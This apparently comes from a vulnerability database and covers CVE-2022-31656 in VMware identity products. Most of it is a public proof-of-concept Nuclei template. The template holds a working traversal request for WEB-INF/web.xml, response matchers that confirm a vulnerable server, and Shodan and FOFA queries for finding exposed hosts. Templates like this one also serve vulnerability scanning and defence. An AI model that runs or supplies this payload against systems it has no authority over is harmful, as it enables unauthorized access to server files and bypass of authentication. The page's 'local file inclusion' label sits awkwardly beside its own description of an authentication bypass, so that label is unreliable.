CVE-2022-31656: VMware - Local File Inclusion

日期: 2025-08-01 | 影响软件: VMware | POC: 已公开

漏洞描述

VMware Workspace ONE Access, Identity Manager, and Realize Automation are vulnerable to local file inclusion because they contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.

PoC代码[已公开]

id: CVE-2022-31656

info:
  name: VMware - Local File Inclusion
  author: DhiyaneshDk
  severity: critical
  description: |
    VMware Workspace ONE Access, Identity Manager, and Realize Automation are vulnerable to local file inclusion because they contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.
  impact: |
    The impact of this vulnerability is that an attacker can read sensitive files on the server, which may contain credentials, configuration files, or other sensitive information.
  remediation: |
    To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in file inclusion operations.
  reference:
    - https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd
    - https://www.vmware.com/security/advisories/VMSA-2022-0021.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31656
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-31656
    cwe-id: CWE-287
    epss-score: 0.82739
    epss-percentile: 0.99197
    cpe: cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: vmware
    product: identity_manager
    shodan-query: http.favicon.hash:-1250474341
    fofa-query:
      - icon_hash=-1250474341
      - app="vmware-workspace-one-access" || app="vmware-identity-manager" || app="vmware-vrealize"
  tags: cve2022,cve,vmware,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/SAAS/t/_/;/WEB-INF/web.xml"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<web-app"
          - "<servlet-name>"
        condition: and

      - type: word
        part: header
        words:
          - "application/xml"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100fe40e62abcf78bddfcd5180804e6a758d5203890d0378454a5649c7703d712c5022048b601a4d3c7c6583165dc5862d070cb68609b6d3249d2cee1f0d4f627d2762d:922c64590222798bb761d5b6d8e72950

相关漏洞推荐